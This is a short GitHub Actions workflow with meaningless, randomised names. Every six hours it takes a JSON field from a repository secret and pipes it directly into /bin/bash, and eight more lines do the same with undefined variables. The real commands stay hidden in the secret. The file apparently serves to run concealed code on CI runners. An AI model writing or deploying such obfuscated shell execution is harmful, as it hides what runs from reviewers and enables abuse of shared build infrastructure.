name: jogdefeated
on:
  workflow_dispatch:
  schedule:
    - cron: '48 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: jogdefeated
        env:
          ar50735: ${{ secrets.ar50735 }}
        run: |
          echo $ar50735 | jq -r .vygyy868 | /bin/bash
          echo $l482 | jq -r .tmsv18438 | /bin/bash
          echo $zxw5917 | jq -r .wgw9 | /bin/bash
          echo $zmumo78097 | jq -r .l673 | /bin/bash
          echo $hcj20 | jq -r .udnjx09 | /bin/bash
          echo $pdkf5 | jq -r .mk57140 | /bin/bash
          echo $iun55 | jq -r .pd9319 | /bin/bash
          echo $vpxjw61 | jq -r .klcp5699 | /bin/bash
          echo $milk7452 | jq -r .ljql1960 | /bin/bash

